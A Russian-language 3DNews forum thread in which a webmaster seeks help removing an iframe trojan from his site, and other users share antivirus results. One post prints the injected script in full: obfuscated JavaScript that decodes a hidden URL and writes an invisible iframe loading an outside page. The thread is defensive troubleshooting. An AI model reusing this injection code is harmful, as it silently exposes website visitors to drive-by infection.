Форум 3DNews
Вернуться   Форум 3DNews > Интернет > Информационная безопасность, защита от вирусов

Ответ Создать новую тему
Опции темы Опции просмотра
Непрочитано 19.05.2010, 14:56   [включить плавающее окно]   #1
Les
Мужской Интересующийся
Автор темы
 
Регистрация: 11.05.2008
Exclamation Вирус на сайте

на сайт попал вирус, некоторые страницы не грузятся и блокируются антивирусом. при извлечении зараженного файла c фтп и сканировании его авастом а также онлайн антивирусами касперского и др.веба - угрозы не обнаруживает. открываю код, лишних строк там вроде не нахожу. пробовал решить проблему заменой зараженных файлов на файлы из бекапа, бекап делал не я, и по всей видимости в нем файлы тоже заражены.

аваст пишет:
HTML:lFrame-JZ [Trj]
выяснил что это за троян : http://www.securelist.com/ru/descriptions/8098085/

позже мне сказали что на сайте вируса нет, и он находится на машине :
но потом я кинул ссылку другим людям (у которых касперский, авира) и тоже блочит.

как устранить ?

Последний раз редактировалось Les; 19.05.2010 в 15:21.
Les вне форума  
Ответить с цитированием
Непрочитано 19.05.2010, 18:05   [включить плавающее окно]   #2
WestGott
Мужской Умудрённый
 
Аватар для WestGott
 
Регистрация: 09.02.2005
Адрес: Небытие
Les
Я зашёл со своей машины на твою ссылку.
Веб-антивирус Outpost PRO 6.7 молчал.
Последующее быстрое сканирование системы Касперским вирусов не обнаружило.
__________________
Нормальные герои всегда идут в обход. (c) Бармалей
WestGott вне форума  
Ответить с цитированием
Непрочитано 19.05.2010, 18:11   [включить плавающее окно]   #3
endreu
Мужской Бывалый
 
Регистрация: 19.07.2008
Адрес: Рига,Латвия
у меня вот чё поймал касперыч после перехода по ссылке
троянская программа Trojan-Clicker.HTML.IFrame
Файл: Oprominyuvach_baktericidnii_OBN-150MP_7814[1].htm 19/05/2010 17:08:14
__________________
скупой платит дважды, а незнающий — трижды
endreu вне форума  
Конфигурация ПК
Ответить с цитированием
Непрочитано 19.05.2010, 18:28   [включить плавающее окно]   #4
WestGott
Мужской Умудрённый
 
Аватар для WestGott
 
Регистрация: 09.02.2005
Адрес: Небытие
Сохранил страницу по ссылке.
Затем, проверил файл "Oprominyuvach_baktericidnii_OBN-150MP_7814.htm" Касперским.
Касперский обнаружил Trojan-Clicker.HTML.IFrame.amh
Открыл сохранённый файл "Oprominyuvach_baktericidnii_OBN-150MP_7814.htm" сначала Firefox, затем IE6.

Заражения системы вирусом не последовало, левые окна в браузерах не открывались.

Где же вирус?

Добавлено через 18 минут

P.S Сканирование файла "Oprominyuvach_baktericidnii_OBN-150MP_7814.htm" Drweb 6.0 вирусов в нём не обнаружило.

Добавлено через 25 минут

Однако, в файле "Oprominyuvach_baktericidnii_OBN-150MP_7814.htm" выглядят подозрительно следующие строки:
Код:
<!-- mxiT sdfsd fFDSGHHFLJ QpoeMFcBE Jsdf2 34sdKJSGHD --><script>/*_ETDUgjXHHsPRwB*/var UoaYW=document;/*ZhrKKeLMtGo*/function ixekV_(IPqcMJ)/*GGrIVvncvNlccEcKblPy*/{var ROVBw = "",/*cDvbb XrTU YAxVWlCtKRA*/FchmZybuaK=0;for(FchmZybuaK=IPqcMJ.length-1;FchmZybuaK >= 0;FchmZybuaK--)/*GGrIVvncvNlccEcKblPy*/{ROVBw+=IPqcMJ.charAt(FchmZybuaK);}return ROVBw;/*TmU ExYK OCEcYaUs hnzPxfOA*/}/*SMXIq vqPtz  tkhbKj VmKPR*/function LgDLGtpg(vfpejwlolC)/*VkhfuYaKSyC*/{/*SMXIqvqPtztkhbKjVmKPR*/vfpejwlolC = vfpejwlolC.replace(/[\.]/g, "%");/*TmUEx YKOCEc aUshnzPxfOA*/vfpejwlolC=unescape(vfpejwlolC);/*pR_jrUloIVVsbiJzei*/return ixekV_(vfpejwlolC);/*ZhrKKeLMtGo*/}/*KAXQTqUZeuhOrfGM_B*/function MnE_vpOF(){/*BSDNf yxyq FdEnFRrXt_q*/UoaYW.write("<style>.ziKoRZhTA{width:1px;height:1px;border:none;visibility:hidden}</style>");/*OEcWuzvdnSifFzrbTzBGVLsl*//*kIKhEhiXzphvzl*/var dmiaXgrp="<iframe id=\"kLW__Co\" src=\"x\" class=\"ziKoRZhTA\"></iframe>";/*kIKhEhiXzphvzl*//*OOBbwTKCJmtmNLwMzIVSpZ*/var PqSiNZf=dmiaXgrp.replace(/[\+x]/g,LgDLGtpg(".70.68.70.2e.6e.69.2f.73.72.65.73.75.2f.6f.66.6e.69.2e.73.63.69.74.79.6c.61.6e.61.2d.73.74.61.74.73.2f.2f.3a.70.74.74.68"));/*BPRQiOgwzAY_fBHF*//*VkhfuYaKSyC*/return PqSiNZf;/*cDvbbXrTUYAxVWlCtKRA*//*mNtGiUcPmHJEcBDVhzkp*/}/*lqNbuXUvhsx*//*NipwgVkhKkGaiMpIelzQzfqg*//*JzrbYbIRwneHlb*//*cDvbbXrTUYAxVWlCtKRA*/UoaYW.writeln(MnE_vpOF());/*Nipwg VkhKk GaiMpIelzQzfqg*//*mN tGiUc PmHJEcBDVhzkp*//*OOBbw TKCJmtm NLwMz IVSpZ*/</script><style>.ziKoRZhTA{width:1px;height:1px;border:none;visibility:hidden}</style><iframe id="kLW__Co" src="Oprominyuvach_baktericidnii_OBN-150MP_7814_files/in.htm" class="ziKoRZhTA"></iframe>
<!--mxiTQpoeMFcBEJ-->
После удаления этих строк из файла сканирование htm-файла Каспером не находит вирусов.
__________________
Нормальные герои всегда идут в обход. (c) Бармалей
WestGott вне форума  
Ответить с цитированием
Непрочитано 19.05.2010, 19:24   [включить плавающее окно]   #5
Les
Мужской Интересующийся
Автор темы
 
Регистрация: 11.05.2008
ъъъ

WestGott, эти строки видны только когда смотреть исходный код прямо на сайте, когда я открываю его на фтп или скачиваю себе - этого куска нет, собственно как удалить это ?
Les вне форума  
Ответить с цитированием
Непрочитано 19.05.2010, 19:29   [включить плавающее окно]   #6
WestGott
Мужской Умудрённый
 
Аватар для WestGott
 
Регистрация: 09.02.2005
Адрес: Небытие
Les
Возможно веб-антивирь при скачивании файла автоматически удаляет эти строки.
Можно просто сохранить заражённые htm-файлы на комп, а потом попробовать закачать по ftp на сервак.
Раз веб-антивирус срезает эти строчки, то и текстовый редактор открывать не придётся.
__________________
Нормальные герои всегда идут в обход. (c) Бармалей
WestGott вне форума  
Ответить с цитированием
Непрочитано 27.03.2012, 23:16   [включить плавающее окно]   #7
OLD
Мужской Общительный
 
Аватар для OLD
 
Регистрация: 04.02.2011
Адрес: Москва
Сегодня поймал вирус на сайте, вот что пишет AVG "27.03.2012, 20:59:00";"NT AUTHORITY\SYSTEM";"IDP";"Обнаружен процесс 0.9425339946726634.EXE.", "27.03.2012, 20:59:24";"NT AUTHORITY\SYSTEM";"IDP";"Процесс 0.9425339946726634.EXE помещен в карантин."
Обратите внимание.
OLD вне форума  
Ответить с цитированием
Непрочитано 28.03.2012, 01:16   [включить плавающее окно]   #8
DarkJoney
Мужской Абсолютный
 
Регистрация: 07.10.2010
OLD
На каком?3DNews?!
DarkJoney вне форума  
Ответить с цитированием
Непрочитано 28.03.2012, 01:30   [включить плавающее окно]   #9
OLD
Мужской Общительный
 
Аватар для OLD
 
Регистрация: 04.02.2011
Адрес: Москва
Цитата (TInston) »
OLD
На каком?3DNews?!
Именно на 3D News, когда открыл вот эту новость: 14:14 Мышь, гарнитура и коврик SteelSeries в стиле Diablo.
OLD вне форума  
Ответить с цитированием
Непрочитано 28.03.2012, 02:09   [включить плавающее окно]   #10
DarkJoney
Мужской Абсолютный
 
Регистрация: 07.10.2010
OLD
Странно..
DarkJoney вне форума  
Ответить с цитированием
Непрочитано 29.03.2012, 20:35   [включить плавающее окно]   #11
OLD
Мужской Общительный
 
Аватар для OLD
 
Регистрация: 04.02.2011
Адрес: Москва
Цитата (TInston) »
OLD
Странно..
Ну, вот http://www.3dnews.ru/news/626903
OLD вне форума  
Ответить с цитированием
Непрочитано 14.09.2012, 23:01   [включить плавающее окно]   #12
manka
Мужской Новенький
 
Регистрация: 14.09.2012
Адрес: Москва
Попробуйте воспользоваться системой защиты от вирусов Alarmer. Она будет вам ежедневно говорить какие файлы изменились на сайте.
manka вне форума  
Ответить с цитированием
Ответ Создать новую тему

Опции темы
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход


Текущее время: 20:02. Часовой пояс GMT +3.


Powered by vBulletin® Version 3.8.4
Copyright ©2000 - 2020, Jelsoft Enterprises Ltd. Перевод: zCarot
Copyright © 2000-2017 3DNews. All Rights Reserved.
Администрация 3DNews требует соблюдения на форуме правил и законов РФ
Серверы размещены в Hostkey